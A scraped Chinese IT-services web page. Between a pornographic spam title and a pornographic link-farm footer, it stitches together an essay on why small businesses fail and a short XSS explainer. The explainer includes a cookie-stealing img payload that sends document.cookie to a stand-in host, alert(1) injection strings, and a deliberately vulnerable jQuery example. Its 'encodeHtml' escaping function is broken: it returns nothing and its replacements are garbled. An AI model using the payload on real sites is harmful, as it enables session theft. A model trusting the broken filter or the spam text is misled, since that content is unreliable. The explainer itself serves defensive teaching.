456成人影院在线观看_亚洲a毛片_日韩9999_伊人网老司机_一本免费视频_最近高清日本免费

IT之道-艾銻知道

您當前位置: 主頁 > 資訊動態(tài) > 艾銻分享 >

艾銻無限安全提示:跨站攻擊(XSS)及防御


2020-03-10 11:52 作者:admin 瀏覽量:
中小微企業(yè)生存的五大法則
 
據(jù)不完全統(tǒng)計,中國有近5000萬家中小微企業(yè),這個數(shù)據(jù)隨著互聯(lián)網(wǎng)的發(fā)展還在持續(xù)增長,但這些企業(yè)的存活率是非常低的,60%的初創(chuàng)企業(yè)活不過1年,30%的初創(chuàng)企業(yè)活不過3年,還有超過9%的企業(yè)只有5年左右的生存期,剩下不到1%的企業(yè)活過5年以上,幸運的可以達到10年,甚至更長一些.
 
為什么中小微企業(yè)的存活率這么低呢?
透過成千上萬的失敗案例,我們總結(jié)了以下五大方面的原因:
 
第一,創(chuàng)業(yè)失敗創(chuàng)始人難辭其咎,我們在學校里是沒有一堂課是教如何創(chuàng)業(yè),如何才能創(chuàng)業(yè)成功,即使現(xiàn)在有很多大學嘗試著在學校開辦一些創(chuàng)業(yè)的課程,也不系統(tǒng),更不專業(yè),因為創(chuàng)業(yè)是一件極其復雜的工作,是需要多項技能的集合以及熟練的運用才有可能應對突如其來的變化,創(chuàng)業(yè)初期就像一艘孤獨的小船面對波濤洶涌的大海,但船長從來都沒有開過任何一艘船駛出過海港,風浪來的時候,只有慌張和恐懼,最后被海水吞沒.
 
第二,創(chuàng)業(yè)失敗是價值觀不統(tǒng)一,方向不一致,團隊不團結(jié),風平浪靜,風和日麗,其實沒什么關系,大家都在享受陽光帶來的美好和快樂,只有遇到風浪,生死攸關或個人利益受到極大沖突時,人性的弱點才會突顯,當每個人只盯著個人得失或眼光短淺時,如果這個時候創(chuàng)始人沒有力挽狂瀾,強大的信念和人格魅力來一統(tǒng)所有人的行動準則,在危機中遲疑,就等于在死神面前跳舞,當年阿里的“中國供應商”客戶涉嫌欺詐事件,如果不是馬云明察秋毫,當即立斷,我相信也不會有今天阿里世界霸主的地位.
 
第三,創(chuàng)業(yè)失敗是固步自封,看不見高山,如果我們只能看見自己的山最高,沒有走出去,沒有學習的心態(tài),沒有敬畏之心,很快時代就會把我們淘汰,當年的諾基亞,柯達就是最好的例子.無論企業(yè)多大,都要有一顆創(chuàng)業(yè)的心,永遠相信還能做的更好,還可以再創(chuàng)新,還會想出其它的可能性.真正的對手不在外面,而在我們心中,心中無敵,才能無敵于天下.
 
第四,創(chuàng)業(yè)失敗是誤解了”客戶是上帝”,上帝并不是時時都知道自己要什么,我們不能只限于客戶表面的表達就決定了他們的需求,很多企業(yè)死就死在客戶的假需求中,看起來好像是客戶追求的產(chǎn)品,需要的服務,但實際當產(chǎn)品生產(chǎn)出來,當服務送到客戶面前,并沒有真正吸引到客戶的注意,愿意為此而買單,核心本質(zhì)就是我們曲解了”客戶是上帝”這句話,真正的上帝是不會當自己是至高無上的,也不會對品質(zhì)無底限的追求,更不會對服務沒有節(jié)制要求,其實客戶就是客戶,他們絕大部分人都是普通人,有著普通人的欲望,有著普通人的不滿足,有著普通人想要花更少的錢卻要得到更多的意識,他們的只忠誠于更便宜更高的品質(zhì),這一切都是企業(yè)需要認知到的本質(zhì),不然你的”上帝”是不會為你持續(xù)付費的.
 
第五,創(chuàng)業(yè)失敗是講多了人情講少了制度,公司小,三五個人可以不需要任何制度,甚至也不需要任何系統(tǒng),因為那時彼此聯(lián)結(jié)非常深,情感的能量可以喚醒每個人的斗志和決心 ,但當企業(yè)發(fā)展到幾十個人甚至幾百個人時,那種深深的聯(lián)結(jié)感很難在感受到,人性的弱點就會被環(huán)境所喚醒,就會被利益所綁架,就會被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最終是服務于人,只有促進發(fā)展的制度,可能激勵人性向善的制度才能長久, 反之亦然.
如果你想想創(chuàng)立一家公司?
如果你是一家剛剛開始創(chuàng)業(yè)的公司?
如果你現(xiàn)在在創(chuàng)業(yè)的過程中遇到了挑戰(zhàn)?
 
結(jié)合上面的五大常見創(chuàng)業(yè)失敗,我們總結(jié)出來了五個可以讓你有更大成功機率的法則,可以讓你活的更久一些,但不保證你一定成功,因為事事變化,因緣和合,萬法無常,只能隨機而變.
 
第一法則:準備自己
創(chuàng)始人需要自我審視,首先要準備好自我犧牲的精神,要做好大海有風暴的思想準備,其次利用一切可以實踐的機會去鍛煉自己的綜合能力,不僅僅相信前輩和書本的聲音,更需要相信實戰(zhàn)后帶來的思考和反思.即要有遠大的理想和抱負,又要有腳踏實地做好每一件事的決心.
 
第二法則:認識自我
創(chuàng)始人要極早的認識自我,想清楚為什么要創(chuàng)業(yè)比創(chuàng)業(yè)更重要,清晰明確的了解自己的價值是什么?什么是自己會堅持的,什么是自己抗拒的,混亂的價值觀就會吸引五花八門的人,企業(yè)內(nèi)部的斗爭都是創(chuàng)始人自己思想的斗爭,初創(chuàng)企業(yè)所呈現(xiàn)出來的一切現(xiàn)象都是創(chuàng)始人內(nèi)在的顯化.當年阿里快速成長,內(nèi)部也出現(xiàn)了一系列的問題,但極其智慧的馬云沒有去解決這些問題,反而把自己關在道觀中整整7天,最后終于想明白了三個問題:我要什么,我有什么,我要放棄什么,當他想清晰這三個問題后,并向全公司傳遞出來,最后所有那些紛繁復雜的問題都不解自明.
第三法則:持續(xù)打開
創(chuàng)始人的天花板就是企業(yè)的天花板,企業(yè)無法突破,就是創(chuàng)始人沒有突破自己,突破其實不容易,因為固有的觀念就像萬里長城一樣,非一日之功,是多少個春夏秋冬,嚴寒酷暑的積累和沉淀,這些不是沒有價值,而是幫助過我們創(chuàng)了價值,讓我們來到了今天這一步,但如果我們期望有一個更大的世界,就需要放下它們,放下我們曾經(jīng)一直的堅持和執(zhí)著,打開自己,讓自己接納一個全新的可能性,也許過不了多久,我們又會把這些新的東西奉為圭臬但只要我們還想看到一個更大的可能性,就需要再次打開自己,重新建立認知,我們一生都是在打開和重建過程中,直到生命的終結(jié),又一切回歸原點.
 
第四法則:回歸本質(zhì)
創(chuàng)始人剛開始需要和團隊一起參與戰(zhàn)斗,甚至做具體細節(jié)工作,因為初創(chuàng)需要激情來點燃,而創(chuàng)始人是這個團隊最有激情的一個人,初創(chuàng)團隊需要有人帶動去點燃更大的燃料.當所有團隊和部門走向正軌時,創(chuàng)始人更大的價值是深度的思考,有效的區(qū)分,精神的引領和正確的選擇.
企業(yè)越來越大,事情就會越來越多,如果沒有一個清醒的大腦保持深度的思考,就像讓企業(yè)很多人很忙,忙是一種現(xiàn)象,并不代表有價值,只有透過深度思考發(fā)現(xiàn)事物的本質(zhì),才知道忙什么才是最重要的,
懂得有效的區(qū)分是一個領導者必須掌握的能力, 《尼布爾的祈禱文》說:”上帝,請賜予我平靜,去接受我無法改變的。給予我勇氣,去改變我能改變的,賜我智慧,分辨這兩者的區(qū)別。”只有具備分辨的智慧,才不會讓自己誤入歧途.
創(chuàng)始人要有強大的精神力量,讓所有員工感受到這股力量,因為所有的成功都離不開一個偉大的精神領袖,就像蘋果的喬布斯,微軟的比爾蓋茨和阿里的馬云.
選擇比努力更重要,這句話告訴我們順勢而為的選擇可以讓我們在同樣的努力情況下獲得不同的結(jié)果,如何才能具備這樣明智選擇的能力呢,強大的深度思考能力和有效的區(qū)分能力就可以幫到我們看見正確的選擇.
 
第五法則:創(chuàng)造系統(tǒng)
創(chuàng)始人是人,是人就會有七情六欲,就會有生老病死,就會有悲歡離合,這些人性的因素會讓我們很不穩(wěn)定,但企業(yè)能持久有效的運轉(zhuǎn)一定是在穩(wěn)定的能量下運行,所以不能始終靠人來推動,企業(yè)想要活的久一定是有內(nèi)生的系統(tǒng),只有建立一個自動運轉(zhuǎn)的系統(tǒng)才能保持穩(wěn)定健康的成長.
以上的分享像從管子里看豹,只看見豹身上的一塊花斑,看不到全豹,以此拋磚引玉,希望有更多人可以把自己創(chuàng)業(yè)的經(jīng)歷和經(jīng)驗分享出來,從而讓我們更全面的看見一家企業(yè)怎樣做才能活得久,活的好,活的更有價值.
 
1.艾銻無限安全提示:跨站攻擊(XSS)及防御
 
 
1. XSS的含義
 顧名思義,就是向web頁面或者網(wǎng)站的url添加惡意的script(腳本)代碼,使用戶訪問該網(wǎng)站時,執(zhí)行惡意代碼,從而達到攻擊的目的。
發(fā)生XSS的場景:
1. 網(wǎng)站對用戶的輸入過濾不足,返回給用戶的展示結(jié)果過濾不足。
2. 網(wǎng)站的鏈接地址未經(jīng)過過濾
2. 如何進行攻擊
攻擊種類多種多樣,通常包含如下:
1. 向網(wǎng)站注入腳本,獲取訪問用戶的cookie或者其他會話信息(session information)等私有數(shù)據(jù)
2. 通過注入腳本,將受害者的網(wǎng)頁重定向到攻擊者控制的網(wǎng)頁
3. 通過注入腳本,在用戶的計算機上執(zhí)行其他惡意操作 
3. XSS攻擊分類
 XSS攻擊分為3類: 存儲型(持久型)、反射型(非持久型)、基于DOM型。危害程度遞減。
 存儲型(Stored/Persistent XSS Attacks)
 危害程度最大,可能危及所有用戶!
 注入的腳本永久的存儲在目標服務器中。當瀏覽器發(fā)送數(shù)據(jù)請求時,受害者和網(wǎng)站的其他用戶都會再次拿到惡意腳本。
 <示例>:
網(wǎng)站的評論功能
評論提交后,存儲到服務器。所有訪問該網(wǎng)站的用戶自動從服務器拉取到惡意代碼。 
// 在評論框中輸入惡意腳本,提交到服務器
hello<script>廣告等</script>
反射型(Reflected/Non-Persistent XSS Attacks)
 一般只危害當前操作用戶 
誘騙用戶點擊惡意鏈接、提交一個被篡改過的表單、瀏覽惡意網(wǎng)站,將惡意代碼注入到訪問者的網(wǎng)站。
web服務器將注入的腳本反射到用戶的瀏覽器,比如通過錯誤信息、查詢結(jié)果等返回瀏覽器。
瀏覽器會執(zhí)行這些惡意代碼,因為它假定響應來自于已經(jīng)交互過的“受信任的”服務器。
<示例>: 
在<img>的url上寫入一個腳本,將本地的cookie通過訪問地址發(fā)送到攻擊者的服務器
<img src=`http://www.fish.com:81?cookie=${document.cookie}` />
基于DOM型(DOM-based XSS Attacks)
攻擊最小,一般通過操作瀏覽器腳本的DOM對象,修改DOM節(jié)點屬性,在DOM節(jié)點插入閉合標簽等,進行攻擊。
<示例>:
通過輸入框給圖片的src賦值,展示圖片
        <input type="text" id="web" /> <button id="add">添加圖片</button>
        <div class="box"></div>
        <script src="/node_modules/jquery/dist/jquery.js"></script>
        <script>
            // 不基于后端, 基于DOM,通過修改屬性、插入內(nèi)容、document.write    
            // 改變結(jié)構(gòu)后造成攻擊
            // 攻擊的內(nèi)容成為xss payload           
            $("#add").on('click', function() {
                // <img src="" onerror="alert(1)" id=""/>
                // " onerror="alert(1)" id="
                // <img src=""><script>alert(1)<\/script>"">   
                // "><script>alert(1)<\/script>"
                $(".box").html(`<img src=${$('#web').val()} />`)
            })
        </script>
 
 4. 如何避免攻擊
所有的攻擊歸根結(jié)底都是該過濾的沒有過濾,該轉(zhuǎn)義的沒有轉(zhuǎn)義。比較完整的避免攻擊方式,需要做以下三步:
1. 客戶端傳遞給服務器時,需要校驗先過濾一下。
   這個方法不能解決問題,因為攻擊者可能會模擬ajax請求。
2. 服務器端再過濾一下
3. 直接在輸出的時候過濾
4. HttpOnly: 防止js讀取cookie后傳遞到第三方
過濾方法:
 
        function encodeHtml(str) {
            str.replace(/&/g, '&').
            replace(/'/g, '"').
            replace(/"/g, ''').
            replace(/</g, '<').replace(/>/g, '>')
        }
 
對于單引號或雙引號,如果輸入內(nèi)容用于后臺或者本地存儲的sql拼接,會導致死循環(huán)等惡意結(jié)果。
 
 

相關文章

IT外包服務
二維碼 關閉
主站蜘蛛池模板: 精品少妇人妻av一区二区_97视频国产自在自线2020_日本高清视频WWW夜色资源_久久久久极品_亚洲欧洲在线视频_中文国产一区_一级特黄在线_成人免费777777被爆出 | 成人网中文字幕_国产精品无码在线_CHINESE熟妇与小伙子MATURE_亚洲一区二区久久久_丰满少妇免费做爰大片人_亚色九九九全国免费视频_亚洲国产精品999久久久婷婷_欧美日韩一区二区三区在线视频 | 在线天堂资源www中文_特级无码A级毛片特黄_中文字幕2018第一页_影音先锋成人影院_天天番号网_亚洲经典视频_日本狠狠色_国产乱码久久久久久 | 久久精品一区二区三区四区_夜夜操夜夜操夜夜操_国产草比视频_日本国产黄色_偷拍一区二区三区视频_久久成人人人人精品欧_中出乱码av亚洲精品久久天堂_欧美日韩一区二区三区在线看黄 | 成人做爰69片免网站_女人高潮潮叫免费视频_97色se_中日韩在线观看_午夜熟女插插XX免费视频_女人被添全过程A片久久AV_国产精品精品国产_国产毛片在线 | 国产电视伦理怡红院在线观看_9999精品免费视频_国产精品高潮呻吟av久久4虎_黄色成人在线播放_国产帅男男GAY网站视频_久久国产精品无码一区_青青草精品在线_亚洲欧美中日韩 | 亚洲综合第一页_亚洲视频三_222aaa免费无码_免费av网站在线观看_亚洲av日韩av永久无码不卡_毛片24种姿势无遮无拦_男人和女人做爽爽视频免费_求个毛片网站 自拍亚洲伦理_天天操综合_91网站在线观看视频_在线观看免费www_777久久精品一区二区三区无码_黑人玩弄人妻中文在线_黄色一级视频_久热精品在线播放 | 新久久久_久9久9色综合_久做在线视频免费观看_2021国产精品成人免费视频_亚洲伦理在线视频_很黄很黄的曰批视频_特级做AA爰片毛片免费看_国产一级不卡视频 | 日本熟妇无码色视频在线观看_国产八十老太另类_国产一级黄色小视频_亚洲一二三四在线_久久99精品视频一区97_又粗又大又黄又爽的免费视频_国产欧美在线看_精品久久久99 | 一级毛片一级毛片一级毛片aa一_国av在线_日韩美女乱淫作爱欣赏_日本a∨视频_久久久久久久久91_久久众筹精品私拍模特_97久久精品_午夜1234 | 狠狠综合久久av一区二区小说_久久只精品99品免费久23_亚洲在线色_免费日韩av_日产日韩在线亚洲欧美_亚洲AV无码一区东京热不卡_欧美拍拍视频免费大全_久久久久久不卡 | 国产SM调教视频在线观看_91精品国产91久久久_久操网在线视频_麻豆我和小性熟乱_暴力强奷在线播放无码_韩国三级爽野战_av一本一道_成年人免费观看网站 | 77777日本少妇久7黄绝片_国产精品天天狠天天看_亚洲中文字幕在线网址_国产亚洲一区二区手机在线观看_午夜影院0606_日日碰狠狠躁久久躁蜜桃_日韩免费视频播放_日本理论片午午伦夜理片2021 热99欧美_久久久精品国产sm调教网站_成人亚洲在线观看_国产一区二区中文字幕免费看_最近中文字幕免费MV在线视频_japanese在线看_色视频www在线播放国产人成_97青娱乐 337P中国人体啪啪_亚洲另类色区欧美日韩图片_成人视频在线观看_国产视频九九_秋霞鲁丝片无码一区二区_欧洲亚洲另类一区在线观看_亚洲成人高清av_亚洲国产成人精品无码区2021 | 欧美国产日韩在线_日韩黄色a_www.草草草_日韩欧美一级视频_久久99热这里只频精品6_国产精品入口福利_中文字幕在线观看第三页_久久成人影院精品99 | 亚洲一区二区三区视频在线_亚洲久本草在线中文字幕_国产综合色在线播放_日本xxxⅹ18一20岁_高潮绝顶抽搐大叫久久精品_中国精品少妇hd_久久久久久午夜_欧美激情片一区二区 | 国产三区四区_欧美激情自拍偷拍_免费网站成人亚洲_精品无人乱码一区二区三区介绍_欧美成人a天堂片在线观看_亚洲精品免费看_欧美在线三级艳情网站_久久久久成人网 | 私人黄色影院_国产伦精品一区二区三区视频我_骚综合网_wwwwxxxxx日本_亚洲一线二线三线品牌精华液_亚洲日本欧美日韩精品_最新中文字幕日韩_av在线视屏 | 热99在线观看_亚洲日韩看片无码超清_在线观看ww_亚洲一区二区视频网站_久久精品99视频_A级毛片100部免费观看_国产黑色丝袜流白浆视频_伊人yinren22综合开心 | 蜜臀久久精品久久久久久酒店?_日韩成人av影院_国产办公室秘书无码精品_中文字幕91爱爱_人妻丝袜AV中文系列先锋影音_欧美一区三区_国产精品美女久久久网站_无码精品一区二区三区四区爱奇艺 | 538国产精品一区二区在线_大陆av在线播放_麻豆传媒一区_91精品国产一区二区三区_亚洲艳妇_男女猛烈啪啪无遮挡激烈下香_久热在线观看视频_www·377黄·com | 九九热久久99国产盗摄蜜臀_一本大道Av伊人久久综合_欧美13处交_成人一区二区三区四区_蜜臀AV免费一区二区三区_999久久久91_超碰在线视97_丰满气质白嫩少妇呻吟高潮 | 久久综合九色_亚洲人在线观看_欧美日韩一区免费_中国女人真人一级毛片_91嫩操_蜜乳av一区二区_一级做a爰片性色毛片是免费_中文字幕无码久久精品 | 国产特级黄色片_欧美自拍小视频_奇色影视_三及片日本_日韩福利_最新中文字幕在线资源_中文字字幕在线中文乱码范文_YY111111少妇影院免费观看 国产精品亚洲综合天堂夜夜_欧美成人小视频_国产人妻精品久久久久野外_日日噜噜噜夜夜爽爽狠狠小说_忘忧草www日本高清_日韩区av_日本在线视频免费观看_真实的国产乱ⅩXXX66V | 欧美亚洲另类图片_男人的天堂免费视频_色噜噜狠狠色综合网图区_阿娇艳z门照片无码av4i_韩国一级片免费_一个人看的www视频免费播放_嗯快点别停舒服好爽受不了了_毛片成人免费看A片 | 国产精品老熟女一区二区三区_69久久夜色精品国产69蝌蚪网_四虎永久在线精品免费一区二区_永久免费在线_精品国产一区二区三区国产区_天天天天天操_久久久久久AV无码免费网站_亚洲高清一区二 | 日本三级日本三级日本三级极_纯欧美一级毛片免费_免费大片av手机看片_国产交换配乱婬视频偷_韩国hd高清xxxx视频_国产成人AV激情在线播放_久久久久久久久久久97_高清性做爰大片免费视频 | 日本一区精品视频_免费看片www8x5xcom_久久久亚洲精品石原莉奈_免费一级大片_亚洲永久精品在线_久久九九国产精品怡红院_青青青青草视频_久久精品A片777777 | 成年人天堂_x88av乱视频_色噜噜噜噜噜噜亚洲精品_日本乱人片一区二区三区_久草在线免费新视频_女人性高朝朝娇喘录音_97狠狠_国产88av | 男ji大巴进入女人的视频免费看_国产精品99久久久久久宅男_国产一区二区三区精品视频_亚洲av无码久久寂寞少妇_国产在线观看影视_a级网站在线观看_欧美黄色片网站_91久久久久久白丝白浆欲热蜜臀 | 国产人妻一区二区三区四区五区六_美妙人妻瑶瑶1一7_日韩91视频_婷婷色一区_内射老妇BBWX0C0CK_国产第一福利_曰韩毛片_成人av无码国产在线观看 | 欧美黄色成人_91视频专区_亚洲一区福利视频_依依激情网_亚洲精品久久无码AV片银杏_亚洲AV国产AV一区无码_无码伊人久久大杳蕉中文无码_性色av蜜臀av牛牛影院 | 无码字幕av一区二区三区_草草视频免费_日韩黄色录相_国产女人高潮叫床视频_成人91免费_午夜亚洲理论片在线观看_国产精品99久久久久久一二区_小777国产主播 | caoporn超碰cao12_亚洲欧美另类一区_97人伦影院A级毛片_亚洲色成人一区二区三区小说_日韩精品一区二区三区高清免费_美女久久视频_一区二区三区国产视频_黑人上司粗大拔不出来 | 九色在线网站_日韩一级黄_老人把我添到了高潮A片_免费看片的视频69xxx_欧美在线欧美在线_精品久久久国产_精品日韩av_精品无人区无码乱码大片国产 | 欧美黄视频网站_亚洲三级黄色片_亚洲精品一区二区网址_在线sese_无码福利日韩神码福利片_在线亚洲无砖砖区免费_在线一区二区三区精品_青草青青在线视频 | YY111111少妇无码理论片_视频免费观看的网站_精品熟女碰碰人人A久久_宅男66LU国产在线观看_性色av蜜臀av高清久久苏然_jizz香蕉视频_天天操天天睡_aaaa大片 | 二级片免费_国产精品午夜久久久久久99热_久久av青久久久av三区三区_免费大片AV手机看片高清_久久精品AV无码夜色_欧美XXXX做受欧美69_久在线视频播放免费视频_国产日韩欧美一区 | 国产免费一级特黄真人视频_9x9x9x人成免费观看y_拍拍拍产国影院在线观看_国产av久久久久精东av_亚洲熟妇无码爱V在线观看_久久精品国产一区_看黄色a级片_久久久久99人妻一区二区三区 | 中文字幕在线精品中文字幕导入_四虎精品国产永久在线观看_久久久久国产成人免费精品免费_三区四区乱码不卡_伊人色私人影院蜜桃va_欧美18免费视频_久久精品国产99久久丝袜_日本伊人久久 | 国产成人女人在线观看_超碰在线a_欧美一区二区在线看_欧美精品第十页_日韩av黄色网址_日本新janpanese乱熟_国内毛片免费看_色综合久久网 | 亚洲精品视频一区_中国少妇xx_亚洲精品男女_国产精品一区二区久久精品爱微奶_欢乐好声音1国语版免费观看_国产在线视频网_国产又色又爽又黄的A片_成人免费av片在线观看 |